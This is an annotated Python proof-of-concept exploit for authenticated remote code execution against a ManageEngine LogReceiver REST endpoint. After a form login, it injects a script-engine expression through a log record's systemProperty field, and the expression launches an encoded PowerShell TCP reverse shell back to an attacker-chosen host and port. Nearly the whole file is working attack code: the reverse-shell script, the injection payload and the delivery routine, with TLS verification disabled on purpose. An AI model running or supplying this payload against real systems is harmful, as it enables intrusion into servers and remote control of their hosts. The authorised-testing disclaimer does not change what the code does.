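#!/usr/bin/env python3
"""Authenticated remote-code-execution proof of concept against a ManageEngine
``/RestAPI/LogReceiver`` endpoint.

Flow: log in through the container's ``j_security_check`` form, then POST a
JSON log record whose ``metaData.systemProperty`` entry is a script-engine
expression. On a vulnerable build that value is evaluated server-side and
spawns ``cmd.exe /c powershell -enc <payload>``, where the payload is a
PowerShell TCP reverse shell back to ``lhost:lport``.

The original script labelled this a deserialization bug; the payload itself
is a script-engine expression evaluated from a system-property value, so
confirm the affected product/version and the bug class independently.
Use only against systems you are explicitly authorised to test.
"""
import base64
import sys

import requests
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Lab targets usually present self-signed certificates, so requests are sent
# with verify=False by default and the per-request warnings are silenced here.
# TLS verification is disabled on purpose for a PoC; do not copy this pattern
# into production code. (requests.packages is a compatibility shim; both lines
# refer to the same warning class.)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

LOGIN_PATH = "/j_security_check"
LOG_RECEIVER_PATH = "/RestAPI/LogReceiver"
# System-property key whose value the target evaluates. The name points at the
# ServiceManager install directory, which suggests ServiceDesk Plus or a related
# ServiceManager-based product -- TODO confirm before relying on this PoC.
INJECTED_PROPERTY = "com.adventnet.servicemanager.install.dir"


def _encode_reverse_shell(lhost, lport):
    """Return the base64 form of a PowerShell TCP reverse shell to lhost:lport.

    ``powershell -enc`` expects the script as base64 over UTF-16LE, not UTF-8.
    ``lhost`` is placed inside a single-quoted PowerShell string verbatim, so a
    value containing a quote breaks the script rather than being escaped.
    """
    script = (
        f"$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});"
        "$stream = $client.GetStream();"
        "[byte[]]$bytes = 0..65535|%{0};"
        "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
        ";$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
        "$sendback = (iex $data 2>&1 | Out-String );"
        "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
        "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
        "$stream.Write($sendbyte,0,$sendbyte.Length);"
        "$stream.Flush()};"
        "$client.Close()"
    )
    return base64.b64encode(script.encode("utf-16le")).decode()


def _build_log_record(encoded_cmd):
    """Build the JSON body for LogReceiver with the injected expression.

    The expression reflectively obtains a ``javax.script`` JavaScript engine
    and evaluates a ``ProcessBuilder`` call that launches
    ``cmd.exe /c powershell -enc <encoded_cmd>``.
    """
    spawn = (
        "new java.lang.ProcessBuilder['(java.lang.String[])']"
        "(['cmd.exe','/c','powershell -enc {}']).start()"
    ).format(encoded_cmd)
    expression = (
        '"".getClass().forName("javax.script.ScriptEngineManager").newInstance()'
        '.getEngineByName("JavaScript").eval("' + spawn + '")'
    )
    return {
        "logType": "name",
        "logData": "raw",
        "hostName": "localhost",
        "appName": "app",
        "logSource": "local",
        "metaData": {"systemProperty": {INJECTED_PROPERTY: expression}},
    }


def _login(session, target_url, username, password, verify):
    """POST the form login; return True only when the reply looks authenticated."""
    form = {"j_username": username, "j_password": password, "submit": "Login"}
    try:
        resp = session.post(
            f"{target_url}{LOGIN_PATH}",
            data=form,
            verify=verify,
            timeout=10,
        )
    except requests.RequestException as exc:
        print(f"[-] Connection error: {exc}")
        return False
    # Checking only for the 'loginError' marker lets a non-2xx reply (e.g. a
    # 401/403 from a proxy or an account lockout) fall through as "logged in",
    # after which the payload would be sent with no session at all.
    if not resp.ok or "loginError" in resp.text:
        print("[-] Authentication failed")
        return False
    return True


def _send_payload(session, target_url, record, verify):
    """POST the crafted log record; return True on HTTP 200.

    HTTP 200 only means the record was accepted -- it does not prove the
    expression ran. The listener receiving a connection is the real oracle.
    """
    print("[+] Sending exploit payload...")
    try:
        resp = session.post(
            f"{target_url}{LOG_RECEIVER_PATH}",
            json=record,
            headers={"Content-Type": "application/json"},
            verify=verify,
            timeout=15,
        )
    except requests.RequestException as exc:
        print(f"[-] Exploit failed: {exc}")
        return False
    if resp.status_code != 200:
        print(f"[-] Exploit failed (Status code: {resp.status_code})")
        return False
    print("[+] Exploit triggered successfully!")
    print("[+] Check your netcat listener for shell")
    return True


def exploit(target_url, username, password, lhost, lport, *, verify=False):
    """Authenticate to the target, then deliver the reverse-shell payload.

    Args:
        target_url: Base URL of the instance, e.g. ``https://host:8443``,
            without a trailing slash (the endpoint paths are appended as-is).
        username: Web login user name.
        password: Web login password.
        lhost: Address the reverse shell connects back to.
        lport: TCP port the reverse shell connects back to. It is interpolated
            into the PowerShell command verbatim; pass a numeric port.
        verify: TLS certificate verification. Off by default for lab targets
            with self-signed certificates.

    Returns:
        True when login succeeded and the payload got HTTP 200; False on a
        failed login, a transport error or any other status. (The original
        returned None on success and False only on some failure paths.)
    """
    # Session holds the post-login cookies; the context manager closes the
    # underlying connection pool on every exit path.
    with requests.Session() as session:
        if not _login(session, target_url, username, password, verify):
            return False
        record = _build_log_record(_encode_reverse_shell(lhost, lport))
        return _send_payload(session, target_url, record, verify)


def main(argv):
    """Parse ``target_url username password lhost lport`` and run the exploit.

    Returns the process exit status: 0 when the payload was accepted, 1 on a
    usage error, an invalid port, or any failure reported by ``exploit``.
    """
    if len(argv) != 6:
        # The original usage line had lost its placeholders and printed only
        # the program name.
        print(f"Usage: {argv[0]} <target_url> <username> <password> <lhost> <lport>")
        print(f"Example: {argv[0]} https://localhost:8443 admin admin 192.168.45.217 9001")
        return 1
    target_url, username, password, lhost, lport = argv[1:]
    # lport ends up inside the PowerShell command; reject anything that is not
    # a valid TCP port instead of shipping a broken payload.
    try:
        port = int(lport)
    except ValueError:
        port = -1
    if not 0 < port < 65536:
        print(f"[-] Invalid lport: {lport!r} (expected 1-65535)")
        return 1
    ok = exploit(target_url.rstrip("/"), username, password, lhost, port)
    return 0 if ok else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))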